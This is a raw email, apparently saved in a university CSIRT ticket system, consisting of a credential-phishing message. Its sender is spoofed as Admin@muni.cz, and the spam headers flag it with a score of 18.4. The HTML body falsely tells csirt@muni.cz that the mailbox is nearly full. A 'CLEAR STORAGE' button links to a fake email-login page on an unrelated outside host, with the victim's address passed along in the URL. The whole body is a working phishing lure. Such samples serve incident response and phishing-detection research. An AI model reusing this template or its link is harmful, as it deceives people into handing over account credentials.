To: csirt@muni.cz
X-Virus-Status: Clean
Date: 28 Feb 2022 18:58:39 -0800
content-type: text/html; charset="utf-8"
X-Muni-O365-Test: mailupdate@hlcarmeuse.com,csirt@muni.cz
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on minas.ics.muni.cz
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
X-Filter-Version: 1.15 (minas)
X-Muni-Envelope-From: mailupdate@hlcarmeuse.com
From mailupdate@hlcarmeuse.com Tue Mar  1 04:08:42 2022
Message-ID: <20220228185839.1EB932BD9BCBDCE9@muni.cz>
X-Spam-Level: ******************
From: Admin@muni.cz
X-RT-Incoming-Encryption: Not encrypted
X-Virus-Scanned: clamav-milter 0.99.4 at minas
X-Muni-Envelope-To: csirt@muni.cz
X-Spam-Flag: YES
X-Spam-Status: Yes, score=18.4 required=5.0 tests=HTML_MESSAGE,MIME_HTML_ONLY, RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_CSS,RCVD_IN_XBL,RDNS_NONE,SPF_SOFTFAIL, TO_NO_BRKTS_NORDNS,TO_NO_BRKTS_NORDNS_HTML autolearn=disabled version=3.3.2
Received: from minas.ics.muni.cz (minas.ics.muni.cz [147.251.4.46]) by rt.csirt.muni.cz (8.15.2/8.15.2/Debian-8+deb9u1) with ESMTP id 22138f2t022268 for <rt@rt.csirt.muni.cz>; Tue, 1 Mar 2022 04:08:42 +0100
Received: from mail0.hlcarmeuse.com (185.174.102.88.deltahost-ptr [185.174.102.88] (may be forged)) by minas.ics.muni.cz (8.14.4/8.14.4/Debian-4+deb7u1) with ESMTP id 22138YfA061522 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT) for <csirt@muni.cz>; Tue, 1 Mar 2022 04:08:37 +0100
X-Muni-Spam-Testip: 185.174.102.88
Subject: Mail Update
X-Greylist: Delayed for 00:30:09 by milter-greylist-4.3.9 (minas.ics.muni.cz [147.251.4.35]); Tue, 01 Mar 2022 04:08:37 +0100 (CET)
X-RT-Original-Encoding: iso-8859-1
X-RT-Interface: Email
Content-Length: 5693

<!DOCTYPE HTML>

<html><head><title></title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
</head>
<body style="margin: 0.4em;"><div class="SC_pct" style='border-color: rgb(231, 231, 231); font: 14px/normal "Segoe UI", Tahoma; margin: 0px 10px; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-spacing: normal; clear: both; word-spacing: 0px; border-bottom-width: 1px; border-bottom-style: solid; white-space: normal; position: relative; widows: 1; font-size-adjust: none; font-stretch: normal; background-color: rgb(255, 255, 255); -webkit-text-stroke-width: 0px;'>
<div class="jsContentpart" id="zmConP1641803639132110001" style="line-height: normal; position: static !important;"><div class="zmPCon" id="zmCP1641803639132110001" style="padding: 10px 0px 0px 15px; line-height: normal;"><div class="zmPCnt" style="line-height: normal; position: static !important;" data-zmcopy="true" data-rmproxyimg="false"><div class="jsConTent" style="line-height: normal; position: static !important;"><div style="line-height: normal; position: static !important;">
<p style='margin: 0px 0px 1.5em; text-align: center; color: rgb(0, 0, 102); line-height: normal; font-family: "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 1.2em; font-weight: 600;'>csirt@muni.cz, your mailbox is almost full.</p>
<table width="325" align="center" style="color: rgb(51, 51, 51); line-height: normal; text-indent: 0px; font-family: &quot;Lucida Grande&quot;, Verdana, Arial, Helvetica, sans-serif; font-size: 11px; margin-bottom: 0px; border-collapse: collapse; table-layout: auto;" border="0" cellspacing="0" cellpadding="0"><tbody style="line-height: normal;"><tr style="height: 0.5em; line-height: normal;">
<td style="background: 0% 50% rgb(218, 60, 47); margin: 0px; width: 321px; line-height: normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 1em;">&nbsp;</td><td style="background: 0% 50% rgb(224, 224, 224); margin: 0px; line-height: normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 1em;">&nbsp;</td></tr></tbody></table>
<table width="325" align="center" style="color: rgb(51, 51, 51); line-height: normal; text-indent: 0px; font-family: &quot;Lucida Grande&quot;, Verdana, Arial, Helvetica, sans-serif; font-size: 11px; margin-bottom: 0px; border-collapse: collapse; table-layout: auto;" border="0" cellspacing="0" cellpadding="0"><tbody style="line-height: normal;"><tr style="line-height: normal;">
<td align="left" style="margin: 0px; line-height: normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 1em;"><span style="color: rgb(218, 60, 47); line-height: normal; font-weight: bold;">4.86 GB</span></td><td align="right" style="margin: 0px; line-height: normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 1em;"><span style="line-height: normal; font-weight: bold;">4.18 GB</span></td></tr></tbody></table>
<p style='margin: 3em auto; text-align: center; color: rgb(51, 51, 51); line-height: normal; font-family: "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 11px;'>You&nbsp;might experience delays or can&nbsp;no longer send and receive messages.<br style="line-height: normal;"><br style="line-height: normal;">
<a style="color: rgb(0, 172, 255); line-height: normal; text-decoration: none !important; cursor: pointer;" href="https://new.micromedia.com.pk/update/emaillogin.html#csirt@muni.cz" target="_blank" rel="noreferrer nofollow noopener"><span style="padding: 5px 10px; border: 1px solid rgb(8, 44, 64); border-image: none; color: rgb(231, 24, 76); line-height: normal; letter-spacing: 2px; font-size: 24px; font-weight: bold;">CLEAR STORAGE</span></a></p>
<p style='margin: 3em auto; text-align: center; color: rgb(51, 51, 51); line-height: normal; font-family: "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 11px;'><span style="line-height: normal; font-weight: bolder;">Mailbox address:</span><br style="line-height: normal;"><strong>csirt@muni.cz</strong></p></div></div>
</div></div><div class="zm_ry" style="border-color: rgb(231, 231, 231); margin: 10px 15px 0px; padding: 10px 0px; line-height: normal; clear: both; border-top-width: 1px; border-top-style: dotted;"><br style="line-height: normal;"></div></div></div>
<div class="SCS_postWra zmCmntScroll" style='font: 14px/normal "Segoe UI", Tahoma; height: auto !important; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-spacing: normal; word-spacing: 0px; white-space: normal; max-height: 752.01px; widows: 1; font-size-adjust: none; font-stretch: normal; background-color: rgb(255, 255, 255); -webkit-text-stroke-width: 0px;'>
<div class="zmCommentBox zmCmntFixed" style='border: 1px solid rgb(212, 212, 212); border-image: none; left: auto; width: 663.06px; color: rgb(0, 0, 0); text-transform: none; line-height: normal; text-indent: 0px; letter-spacing: normal; font-family: "Lato 2", sans-serif; font-size: 14px; font-style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; position: fixed; orphans: 2; widows: 2; background-color: rgb(255, 255, 255);'>
<br class="Apple-interchange-newline" style='color: rgb(0, 0, 0); text-transform: none; line-height: normal; text-indent: 0px; letter-spacing: normal; font-family: "Lato 2", sans-serif; font-size: 14px; font-style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; orphans: 2; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; font-variant-ligatures: normal; font-variant-caps: normal;'>
</div></div></body></html>
